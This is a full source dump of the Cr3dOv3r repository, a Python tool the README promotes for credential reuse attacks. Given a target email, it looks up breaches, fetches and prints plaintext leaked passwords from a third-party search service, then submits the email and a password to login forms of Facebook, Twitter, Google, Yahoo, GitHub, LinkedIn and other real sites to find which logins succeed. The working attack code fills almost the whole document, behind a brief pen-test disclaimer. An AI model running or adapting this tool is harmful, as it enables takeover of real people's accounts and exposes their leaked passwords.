├── .gitattributes ├── .github └── FUNDING.yml ├── .gitignore ├── Core ├── __init__.py ├── color.py ├── ispwned.py ├── updater.py ├── utils.py └── websites.py ├── Cr3d0v3r.py ├── Data ├── Email1.png ├── Email2.png ├── Email3.png ├── banners.txt └── version.txt ├── Dockerfile ├── LICENSE ├── README.md ├── requirements.txt └── win_requirements.txt /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto -------------------------------------------------------------------------------- /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | github: D4Vinci 2 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | *.egg-info/ 24 | .installed.cfg 25 | *.egg 26 | 27 | # PyInstaller 28 | # Usually these files are written by a python script from a template 29 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 
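30 | *.manifest 31 | *.spec 32 | 33 | # Installer logs 34 | pip-log.txt 35 | pip-delete-this-directory.txt 36 | 37 | # Unit test / coverage reports 38 | htmlcov/ 39 | .tox/ 40 | .coverage 41 | .coverage.* 42 | .cache 43 | nosetests.xml 44 | coverage.xml 45 | *.cover 46 | .hypothesis/ 47 | 48 | # Translations 49 | *.mo 50 | *.pot 51 | 52 | # Django stuff: 53 | *.log 54 | local_settings.py 55 | 56 | # Flask stuff: 57 | instance/ 58 | .webassets-cache 59 | 60 | # Scrapy stuff: 61 | .scrapy 62 | 63 | # Sphinx documentation 64 | docs/_build/ 65 | 66 | # PyBuilder 67 | target/ 68 | 69 | # Jupyter Notebook 70 | .ipynb_checkpoints 71 | 72 | # pyenv 73 | .python-version 74 | 75 | # celery beat schedule file 76 | celerybeat-schedule 77 | 78 | # SageMath parsed files 79 | *.sage.py 80 | 81 | # Environments 82 | .env 83 | .venv 84 | env/ 85 | venv/ 86 | ENV/ 87 | 88 | # Spyder project settings 89 | .spyderproject 90 | .spyproject 91 | 92 | # Rope project settings 93 | .ropeproject 94 | 95 | # mkdocs documentation 96 | /site 97 | 98 | # mypy 99 | .mypy_cache/ 100 | -------------------------------------------------------------------------------- /Core/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/D4Vinci/Cr3dOv3r/4e1f7845f341fa09e4b998f9c7064133cfa43d9f/Core/__init__.py -------------------------------------------------------------------------------- /Core/color.py: --------------------------------------------------------------------------------
# -*- coding: utf-8 -*-
# Written by: Karim shoair - D4Vinci
# Copied from Cr3dOv3r Framework ( Wait for it :D )
import os,sys

# Terminal colour constants. The other modules pull them in with
# `from .color import *`, so every one of these names has to exist once this
# module has been imported. set_colors() below fills them in.
G = Y = B = R = W = M = C = end = Bold = underline = ''


def set_colors():
    """Populate the module-level colour constants.

    On Windows the ANSI codes are used only when win_unicode_console and
    colorama can be imported and initialised; otherwise every constant is the
    empty string and output is plain text. On any other platform the ANSI
    codes are used unconditionally.
    """
    global G, Y, B, R, W, M, C, end, Bold, underline
    if os.name == "nt":
        try:
            import win_unicode_console, colorama
            win_unicode_console.enable()
            colorama.init()
        except Exception:
            # Fix: the original fallback assigned G, Y, B, R, W, Bold and
            # underline only. M, C and end stayed undefined, so status() and
            # error() raised NameError whenever one of the packages was missing.
            G = Y = B = R = W = M = C = end = Bold = underline = ''
            return
    # green - yellow - blue - red - white - magenta - cyan - reset
    G, Y, B, R, W, M, C, end = '\033[92m', '\033[93m', '\033[94m', '\033[91m', '\x1b[37m', '\x1b[35m', '\x1b[36m', '\033[0m'
    Bold = "\033[1m"
    underline = "\033[4m"


set_colors()


def status(text):
    """Print an informational line: cyan "[+] " prefix, green text, then reset."""
    print( C+"[+] "+G+text+end )


def error(text):
    """Print an error line: magenta "[!] " prefix, red text, then reset."""
    print( M+"[!] "+R+text+end )
-------------------------------------------------------------------------------- /Core/ispwned.py: --------------------------------------------------------------------------------
#Written by: Karim shoair - D4Vinci ( Cr3dOv3r )
# -*- encoding: utf-8 -*-
import requests,sys
from .color import *
if sys.version[0] == '2':
    # Fix: `imp` was imported unconditionally, but the module was removed in
    # Python 3.12, which made this file fail at import time there. Only the
    # Python 2 path needs reload().
    from imp import reload
    reload(sys)
    sys.setdefaultencoding("utf-8")

# Sent with every lookup made by this module.
UserAgent = {'User-Agent': 'Cr3dOv3r-Framework'}


def check_haveibeenpwned(email):
    """Ask the Haveibeenpwned v2 "breachedaccount" endpoint about *email*.

    Returns the decoded JSON list of breaches on HTTP 200, False on HTTP 404
    and None (after printing an error) for any other status. Both False and
    None are falsy, so callers that only test truthiness behave as before.
    """
    #from haveibeenpwnd API docs from https://haveibeenpwned.com/API/v2#BreachesForAccount
    # Fix: the address is caller-supplied and was concatenated into the URL
    # path unescaped; percent-encode it so characters such as "/", "?" or "#"
    # cannot change which resource is requested.
    url = "https://haveibeenpwned.com/api/v2/breachedaccount/"+requests.compat.quote(str(email), safe="")
    req = requests.get(url, headers=UserAgent)
    if req.status_code==200:
        return req.json()
    if req.status_code != 404:
        # Fix: rate limiting, blocking and server errors used to be reported
        # as "no leaks found", which reads like a clean result.
        error("Haveibeenpwned lookup failed (HTTP {}), result unknown!".format(req.status_code))
        return None
    return False


def grab_password(email):
    """Query the ghostproject.fr search endpoint for *email*.

    Returns False when the response contains "Error" or splits into exactly
    two pieces, otherwise the pieces between the first and the last one.
    The address is sent to a third-party service, and parse_data() below
    prints part of each returned entry to the terminal.
    """
    # No docs(Because no API), just found it by analyzing the network and told the admin :D
    url = "https://ghostproject.fr/search.php"
    data = {"param":email}
    req = requests.post(url,headers=UserAgent,data=data)
    # Splits on the two-character sequence backslash + "n", not on a newline.
    result = req.text.split("\\n")
    if "Error" in req.text or len(result)==2:
        return False
    else:
        return result[1:-1]


def parse_data(email,np):
    """Print the leak information found for *email*.

    Args:
        email: address to look up.
        np: when true, skip the plaintext-password lookup.
    """
    data = check_haveibeenpwned(email)
    if data is None:
        # The lookup itself failed and check_haveibeenpwned() already said so;
        # do not claim that no leaks exist.
        pass
    elif not data:
        error("No leaks found in Haveibeenpwned website!")
    else:
        status("Haveibeenpwned website results: "+Y+str(len(data)))
        form = "Name : {web} | Date : {date} | What leaked : {details}"
        for website in data:
            line = form.format(web=M+website["Name"]+B,date=M+website["AddedDate"]+B,details=M+",".join(website["DataClasses"])+B)
            status(B+line)
    # NOTE(review): indentation was rebuilt from a flattened listing; confirm
    # whether this block belongs at function level or inside the else above.
    if not np:
        p = grab_password(email)
        if p:
            status("Plaintext password(s) found!")
            for pp in p:
                # Prints the field after the first ":" of each entry, in clear,
                # so it also lands in terminal scrollback and session logs.
                print(C+" │"+B+" └──── "+W+pp.split(":")[1])
        else:
            error("Didn't find any plaintext password published!")
-------------------------------------------------------------------------------- /Core/updater.py: --------------------------------------------------------------------------------
# -*- encoding: utf-8 -*-
#Written by: Karim shoair - D4Vinci ( Cr3dOv3r )
import os,sys
from .color import *
if sys.version_info[0]==3:
    from urllib.request import urlopen
elif sys.version_info[0]==2:
    from urllib import urlopen


def check():
    """Compare the local version file with the one published on GitHub.

    Returns the local version string, with a notice appended when the
    published version differs, or a fixed warning when the published version
    is "1.0". Prints an error and exits the process when the remote file
    cannot be fetched.

    Data/version.txt is opened relative to the current working directory.
    """
    # Fix: the file handle was never closed.
    with open( os.path.join("Data","version.txt"), 'r') as f:
        file_data = f.read().strip()
    try:
        version = urlopen('https://raw.githubusercontent.com/D4Vinci/Cr3dOv3r/master/Data/version.txt').read().decode('utf-8').strip()
    except Exception:
        # Fix: a bare `except:` also swallowed KeyboardInterrupt/SystemExit.
        error("Can't reach Internet !!!")
        # Exit status 0 is kept from the original even though this is a failure.
        sys.exit(0)

    if version=="1.0":
        return R+Bold+"This is very old version stop using it ! Cr3dOv3r became framework now, pull it! :D"
    elif version != file_data:
        return file_data+R+" but new version is available!"
    else:
        return file_data
-------------------------------------------------------------------------------- /Core/utils.py: --------------------------------------------------------------------------------
# -*- encoding: utf-8 -*-
#Written by: Karim shoair - D4Vinci ( Cr3dOv3r )
import sys,os
from . import updater
from .websites import *
from .color import *


def getinput(text):
    """Prompt with *text* and return the typed line.

    Uses input() on Python 3 and raw_input() otherwise. Unlike getpass(),
    both echo what is typed.
    """
    # Return the suitable input type according to python version
    ver = sys.version[0]
    if ver=="3":
        return input(text)
    else:
        return raw_input(text)


def banner():
    """Clear the screen and print the banner from Data/banners.txt.

    Calls updater.check(), so it needs network access and exits the process
    when the version file cannot be fetched.
    """
    # Fix: the builtin open() has no `encoding` argument on Python 2, which
    # the README lists as supported; io.open() accepts it on both versions.
    import io
    if os.name=="nt":
        os.system("cls")
    else:
        os.system("clear")
    version = updater.check()
    # Fix: the banner file was opened without ever being closed.
    with io.open(os.path.join("Data","banners.txt"), encoding="utf8") as banner_file:
        banner = banner_file.read()
    banner_to_print = G + banner.format(Name=R+"Cr3d0v3r By "+Bold+B+"D4Vinci -"+M+" V"+version+end+G,
        Description=C+"Know the dangers of email credentials reuse attacks."+G,
        Loaded=B+"Loaded "+Y+str(len(all_websites))+B+" website."+G) + end
    print(banner_to_print)


# Display names of every configured site, across the three login styles
# defined in websites.py.
all_websites =list(websites.keys()) + list(custom_websites.keys()) + list(req_websites.keys())
-------------------------------------------------------------------------------- /Core/websites.py: --------------------------------------------------------------------------------
# -*- encoding: utf-8 -*-
#Written by: Karim shoair - D4Vinci ( Cr3dOv3r )
#Instead of creating many config/text files and parse them I think this better because I'm lazy and it's easier to add new website :D .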
#See how to add a website in the repo wiki

# Keys used by the entries below, as they are read in Cr3d0v3r.py:
#   "url"    - page that is opened (or POSTed to, for the request-based entry)
#   "form"   - selector handed to select_form(); "form1"/"form2" for two-step logins
#   "e_form" - name of the field that receives the email/username
#   "p_form" - name of the field that receives the password
#   "verify" - request-based entry only: words whose presence in the response
#              is treated as a failed login

#Normal websites (That use one form)
#Facebook data
facebook = { "url":"https://en-gb.facebook.com/login.php" ,
    "form":"#login_form",
    "e_form":"email" ,
    "p_form":"pass" }

#Twitter data
twitter = { "url":"https://mobile.twitter.com/sessions" ,
    "form":'form[action="/sessions"]',
    "e_form":"session[username_or_email]",
    "p_form":"session[password]"}

#Ask.fm data
ask = { "url":"https://ask.fm/login" ,
    "form":'form[action="/login"]',
    "e_form":"login" ,
    "p_form":"password" }

#linkedin
#the reason for LinkedIn false positives :3 it's because of captcha appears from the second attempt!
# let's solve that
linkedin = { "url":"https://www.linkedin.com/uas/login" ,
    "form":'#login',
    "e_form":"session_key" ,
    "p_form":"session_password" }

#Github
github = { "url":"https://github.com/login" ,
    "form":'form[action="/session"]',
    "e_form":"login" ,
    "p_form":"password" }

# The triple-quoted block below is a bare string, i.e. a disabled entry.
'''#Needs to enable JS ? Okay I do that later with dryscrape maybe
#Protonmail
protonmail = { "url":"https://mail.protonmail.com/login" ,
"form":'form[action="login"]',
"e_form":"username" ,
"p_form":"password" }
'''

#VirusTotal
virustotal = { "url":"https://www.virustotal.com/en/account/signin/",
    "form":'form[id="frm-signin"]',
    "e_form":"username" ,
    "p_form":"password" }

#Ebay
ebay = { "url":"https://signin.ebay.com/ws/eBayISAPI.dll" ,
    "form":'#SignInForm',
    "e_form":"userid" ,
    "p_form":"pass" }

#Wikipedia
wikipedia = { "url":"https://en.wikipedia.org/w/index.php?title=Special:UserLogin" ,
    "form":'form[action="/wiki/Special:UserLogin"]',
    "e_form":"wpName" ,
    "p_form":"wpPassword" }

#StackOverFlow
stackoverflow = { "url":"https://stackoverflow.com/users/login" ,
    "form":'form[id="login-form"]',
    "e_form":"email" ,
    "p_form":"password" }

#FourSquare
foursquare = { "url":"https://foursquare.com/login" ,
    "form":'form[id="loginToFoursquare"]',
    "e_form":"emailOrPhone" ,
    "p_form":"password" }

#Gitlab
gitlab = { "url":"https://gitlab.com/users/sign_in" ,
    "form":'form[action="/users/sign_in"]',
    "e_form":"user[login]" ,
    "p_form":"user[password]" }

#Airdroid
air = { "url":"https://www.airdroid.com/en/signin/",
    "form":'form[id="form_sign"]',
    "e_form":"email" ,
    "p_form":"password" }

#---------------------------------------------------
#Websites that uses two forms
#Gmail
google = { "url":"https://accounts.google.com/signin" ,
    "form1":'form[id="gaia_loginform"]',
    "form2":'form[id="gaia_loginform"]',
    "e_form":"Email",
    "p_form":"Passwd"}

#Yahoo
yahoo = { "url":"https://login.yahoo.com" ,
    "form1":'form[id="login-username-form"]',
    "form2":'form[class="pure-form pure-form-stacked"]',
    "e_form":"username",
    "p_form":"password"}

#--------------------------------------
#Websites login with post requests
#MediaFire
mediafire = { "url":"https://www.mediafire.com/dynamic/client_login/mediafire.php" ,
    "e_form":"login_email" ,
    "p_form":"login_pass",
    "verify":["login"]#After submitting if this words exist in the response page then login not successful
    }

##############################
#### Organizing websites #####
##############################
# The keys are the display names printed next to each result.
websites = {" Facebook":facebook,
    " Twitter ":twitter,
    " Ask.fm ":ask,
    " Github ":github,
    "Virustotal":virustotal,
    "LinkedIn ":linkedin,
    " Ebay.com":ebay,
    "Wikipedia":wikipedia,
    " Airdroid":air,
    " StackOF ":stackoverflow,
    "FourSquare":foursquare,
    " Gitlab ":gitlab
    }

custom_websites = {" Google ":google,
    " Yahoo ":yahoo
    }

req_websites = { "Mediafire":mediafire
    }

-------------------------------------------------------------------------------- /Cr3d0v3r.py: --------------------------------------------------------------------------------
#Written by: Karim shoair - D4Vinci ( Cr3dOv3r )
# -*- coding: utf-8 -*-
import os,argparse,requests,signal
from getpass import getpass
import mechanicalsoup as ms
from Core import ispwned
from Core.utils import *
from Core.color import *

# NOTE(review): `sys` is not imported in this file; it presumably arrives
# through the star import from Core.utils - confirm.
def signal_handler(signal, frame):
    # Ctrl+C: emit the colour reset code, then exit with status 0.
    print(end+'\n')
    sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)

# Argument parsing runs at module level, so importing this file already
# consumes sys.argv.
parser = argparse.ArgumentParser(prog='Cr3d0v3r.py')
parser.add_argument("email", help="Email/username to check")
parser.add_argument("-p",action="store_true", help="Don't check for leaks or plain text passwords.")
parser.add_argument("-np",action="store_true", help="Don't check for plain text passwords.")
parser.add_argument("-q",action="store_true", help="Quiet mode (no banner).")
args = parser.parse_args()
email = args.email

def is_there_captcha(page_source):
    # Returns True when the lower-cased page text contains either marker below.
    # Only these two reCAPTCHA substrings are looked for; any other challenge
    # page is not recognised by this check.
    # Got these words from the recaptcha api docs Muhahahaha
    if any( w in page_source.lower() for w in ["recaptcha/api","grecaptcha"]):
        return True
    return False

#with mechanicalsoup
def login( name ,dic ,email ,pwd ):
    # Single-form login attempt for one entry of `websites`.
    #   name  - display name used in the printed result
    #   dic   - site entry with "url", "form", "e_form" and "p_form"
    #   email, pwd - credentials filled into the form
    # Prints the outcome through status()/error() and returns None.
    url ,form,e_form ,p_form = dic["url"] ,dic["form"],dic["e_form"] ,dic["p_form"]
    browser = ms.StatefulBrowser()
    try:
        browser.open(url)
    except:
        # Bare except: every failure, not only network errors, ends up here.
        error("[{:10s}] Couldn't even open the page! Do you have internet !?".format(name))
        return

    if is_there_captcha(browser.get_current_page().text):
        # The browser is not closed on this early return.
        error("[{:10s}] Found captcha on page loading!".format(name))
        return

    try:
        browser.select_form(form)
        browser[e_form] = email
        browser[p_form] = pwd
        browser.submit_selected()
    except ms.utils.LinkNotFoundError:
        error("[{:10s}] Something wrong with the website maybe it's blocked!".format(name))
        return

    if is_there_captcha(browser.get_current_page().text):
        error("[{:10s}] Found captcha after submitting login page!".format(name))
        return
    #Now let's check if it was success by trying to use the same form again and if I could use it then the login not success
    # The result is inferred, not confirmed: any response page that lacks the
    # login form (an error page, an interstitial, a redirect) is printed as
    # "Login successful!", so that message can be a false positive.
    try:
        browser.select_form(form)
        browser.close()
        error("[{:10s}] Login unsuccessful!".format(name))
    except ms.utils.LinkNotFoundError:
        browser.close()
        status("[{:10s}] Login successful!".format(name))

#websites that use two forms to login
def custom_login( name ,dic ,email ,pwd ):
    # Two-step login attempt for one entry of `custom_websites`: the email is
    # submitted through "form1", the password through "form2".
    # Prints the outcome through status()/error() and returns None.
    url ,form1,form2,e_form ,p_form = dic["url"] ,dic["form1"],dic["form2"],dic["e_form"] ,dic["p_form"]
    browser = ms.StatefulBrowser()
    try:
        browser.open(url)
    except:
        error("[{:10s}] Couldn't even open the page! Do you have internet !?".format(name))
        return

    if is_there_captcha(browser.get_current_page().text):
        error("[{:10s}] Found captcha on page loading!".format(name))
        return

    try:
        browser.select_form(form1)
        browser[e_form] = email
    except ms.utils.LinkNotFoundError:
        error("[{:10s}] Something wrong in parsing, maybe it displayed captcha!".format(name))
        return

    try:
        browser.submit_selected()
        browser.select_form(form2)
        browser[p_form] = pwd
        browser.submit_selected()
    except ms.utils.LinkNotFoundError:
        # A missing second form is reported as "not registered"; the code has
        # no other evidence for that conclusion.
        browser.close()
        error("[{:10s}] Email not registered!".format(name))
        return

    if is_there_captcha(browser.get_current_page().text):
        error("[{:10s}] Found captcha after submitting login page!".format(name))
        return
    #Now let's check if it was success by trying to use the same form again and if I could use it then the login not success
    # Same inference as in login(), but with a bare except: any exception
    # raised here, whatever its cause, is printed as "Login successful!".
    try:
        browser.select_form(form2)
        browser.close()
        error("[{:10s}] Login unsuccessful!".format(name))
    except:
        browser.close()
        status("[{:10s}] Login successful!".format(name))
    #That's a lot of exceptions :"D

#Login to websites with post requests
def req_login( name ,dic ,email ,pwd ):
    # Request-based attempt for one entry of `req_websites`: a single POST of
    # the two fields, judged by the words listed under "verify".
    # Prints the outcome through status()/error() and returns None.
    url ,verify,e_form ,p_form = dic["url"] ,dic["verify"],dic["e_form"] ,dic["p_form"]
    data = {e_form:email,p_form:pwd}
    req = requests.post(url,data=data).text
    if is_there_captcha(req):
        # The message says "on page loading", but the text checked here is the
        # response to the POST.
        error("[{:10s}] Found captcha on page loading!".format(name))
        return
    #Now let's check if it was success by trying to find the verify words and if I could find them then login not successful
    # The HTTP status code is never looked at; a response without the verify
    # words is printed as "Login successful!" whatever it actually is.
    if any( word in req for word in verify):
        error("[{:10s}] Login unsuccessful!".format(name))
        return
    status("[{:10s}] Login successful!".format(name))

def main():
    # Entry point: optional banner, optional leak lookup, password prompt,
    # then one attempt per configured site in each of the three groups.
    if not args.q:
        banner()
    if not args.p:
        status("Checking email in public leaks...")
        ispwned.parse_data(email,args.np)

    print(C+" │"+end)
    line =C+" └──=>Enter a password"+W+"─=> "
    if os.name=="nt":
        # getinput() is input()/raw_input(), so on Windows the password is
        # echoed to the console as it is typed.
        pwd = getinput(line) #Escaping the echo warning, sorry guyss (¯\_(ツ)_/¯)
    else:
        pwd = getpass(line)

    print("")
    status("Testing email against {} website".format( Y+str(len(all_websites))+G ))
    for wd in list(websites.keys()):
        dic = websites[wd]
        login( wd ,dic ,email ,pwd )

    for wd in list(custom_websites.keys()):
        dic = custom_websites[wd]
        custom_login( wd ,dic ,email ,pwd )

    for wd in list(req_websites.keys()):
        dic = req_websites[wd]
        req_login( wd ,dic ,email ,pwd )

if __name__ == '__main__':
    main()

-------------------------------------------------------------------------------- /Data/Email1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/D4Vinci/Cr3dOv3r/4e1f7845f341fa09e4b998f9c7064133cfa43d9f/Data/Email1.png -------------------------------------------------------------------------------- /Data/Email2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/D4Vinci/Cr3dOv3r/4e1f7845f341fa09e4b998f9c7064133cfa43d9f/Data/Email2.png -------------------------------------------------------------------------------- /Data/Email3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/D4Vinci/Cr3dOv3r/4e1f7845f341fa09e4b998f9c7064133cfa43d9f/Data/Email3.png -------------------------------------------------------------------------------- /Data/banners.txt: -------------------------------------------------------------------------------- 1 | 2 | 3 | ▄████▄ ██▀███ ▓█████ ▓█████▄ ▒█████ ██▒ █▓▓█████ ██▀███ 4 | ▒██▀ ▀█ ▓██ ▒ ██▒▓█ ▀ ▒██▀ ██▌▒██▒ ██▒▓██░ █▒▓█ ▀ ▓██ ▒ ██▒ 5 | ▒▓█ ▄
▓██ ░▄█ ▒▒███ ░██ █▌▒██░ ██▒ ▓██ █▒░▒███ ▓██ ░▄█ ▒ {Name} 6 | ▒▓▓▄ ▄██▒▒██▀▀█▄ ▒▓█ ▄ ░▓█▄ ▌▒██ ██░ ▒██ █░░▒▓█ ▄ ▒██▀▀█▄ {Description} 7 | ▒ ▓███▀ ░░██▓ ▒██▒░▒████▒░▒████▓ ░ ████▓▒░ ▒▀█░ ░▒████▒░██▓ ▒██▒ {Loaded} 8 | ░ ░▒ ▒ ░░ ▒▓ ░▒▓░░░ ▒░ ░ ▒▒▓ ▒ ░ ▒░▒░▒░ ░ ▐░ ░░ ▒░ ░░ ▒▓ ░▒▓░ 9 | ░ ▒ ░▒ ░ ▒░ ░ ░ ░ ░ ▒ ▒ ░ ▒ ▒░ ░ ░░ ░ ░ ░ ░▒ ░ ▒░ 10 | ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░░ ░ ░░ ░ 11 | ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 12 | ░ ░ ░ 13 | -------------------------------------------------------------------------------- /Data/version.txt: -------------------------------------------------------------------------------- 1 | 0.4.4 2 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3-slim 2 | 3 | RUN apt-get update && apt-get -y install git 4 | RUN git clone https://github.com/D4Vinci/Cr3dOv3r.git 5 | WORKDIR Cr3dOv3r/ 6 | RUN pip install -r requirements.txt 7 | 8 | ENTRYPOINT ["python", "Cr3d0v3r.py"] 9 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2017 Karim shoair 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 
14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Cr3dOv3r [![Python 3.5](https://img.shields.io/badge/Python-3.5-yellow.svg)](http://www.python.org/download/) [![Python 2.7](https://img.shields.io/badge/Python-2.7-yellow.svg)](http://www.python.org/download/) ![Build Status](https://img.shields.io/badge/Version-0.4.4-red.svg) 2 | 3 | **Your best friend in credential reuse attacks.** 4 | 5 | You give Cr3dOv3r an email, then it does two simple, useful jobs with it: 6 | - It searches for public leaks containing the email and returns the results with the most useful details about each leak (using the haveibeenpwned API), and it tries to get the plain text passwords from the leaks it finds (using [@GhostProjectME](https://twitter.com/GhostProjectME)). 7 | - Then you give it a password or a leaked password, and it tries these credentials against some well-known websites (ex: Facebook, Twitter, Google...) and tells you whether the login was successful and whether there is a captcha somewhere blocking the way! 8 | 9 | ### Some of the scenarios Cr3dOv3r can be used in 10 | - Check if the targeted email is in any leaks and then use the leaked password to check it against the websites. 11 | - Check if the target credentials you found are reused on other websites/services. 12 | - Check if the old password you got from the target/leaks is still used on any website. 
13 | 14 | # Screenshots 15 | ![screenshot](https://github.com/D4Vinci/Cr3dOv3r/blob/master/Data/Email1.png) 16 | ![screenshot](https://github.com/D4Vinci/Cr3dOv3r/blob/master/Data/Email2.png) 17 | ![screenshot](https://github.com/D4Vinci/Cr3dOv3r/blob/master/Data/Email3.png) 18 | 19 | # Usage 20 | ``` 21 | usage: Cr3d0v3r.py [-h] [-p] [-np] [-q] email 22 | 23 | positional arguments: 24 | email Email/username to check 25 | 26 | optional arguments: 27 | -h, --help show this help message and exit 28 | -p Don't check for leaks or plain text passwords. 29 | -np Don't check for plain text passwords. 30 | -q Quiet mode (no banner). 31 | 32 | ``` 33 | 34 | ## Installing and requirements 35 | ### To make the tool work at its best you must have: 36 | - Python 3.x or 2.x (preferred 3). 37 | - Linux or Windows system. 38 | - Worked on some machines with MacOS and python3. 39 | - The requirements mentioned in the next few lines. 40 | 41 | ### Installing 42 | **+For windows : (After downloading the ZIP and unzipping it)** 43 | ``` 44 | cd Cr3dOv3r-master 45 | python -m pip install -r win_requirements.txt 46 | python Cr3d0v3r.py -h 47 | ``` 48 | **+For Linux :** 49 | ``` 50 | git clone https://github.com/D4Vinci/Cr3dOv3r.git 51 | cd Cr3dOv3r 52 | python3 -m pip install -r requirements.txt 53 | python3 Cr3d0v3r.py -h 54 | ``` 55 | 56 | **+For docker :** 57 | ```bash 58 | git clone https://github.com/D4Vinci/Cr3dOv3r.git 59 | docker build -t cr3dov3r Cr3dOv3r/ 60 | docker run -it cr3dov3r "test@example.com" 61 | ``` 62 | 63 | 64 | **If you want to add a website to the tool, follow the instructions in the [wiki](https://github.com/D4Vinci/Cr3dOv3r/wiki)** 65 | 66 | ## Contact 67 | - [Twitter](https://twitter.com/D4Vinci1) 68 | 69 | ## Donation 70 | If this tool has been useful for you, feel free to thank me by buying me a coffee :) 71 | 72 | [![Coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://buymeacoffee.com/d4vinci) 73 | 74 | ## Disclaimer 75 | 
Cr3dOv3r was created to show how dangerous credential reuse attacks can get, and it is not responsible for misuse or illegal purposes. Use it only for Pen-test or educational purposes !!! 76 | 77 | Copying code from this tool or using it in another tool is accepted as long as you mention where you got it from :smile: 78 | 79 | > Pull requests are always welcomed :D 80 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | mechanicalsoup >=0.9 2 | requests>=2.18.4 3 | pyOpenSSL>=16.2.0 4 | -------------------------------------------------------------------------------- /win_requirements.txt: -------------------------------------------------------------------------------- 1 | mechanicalsoup >=0.9 2 | requests>=2.18.4 3 | win_unicode_console 4 | colorama>=0.3.7 5 | pyOpenSSL>=16.2.0 6 | --------------------------------------------------------------------------------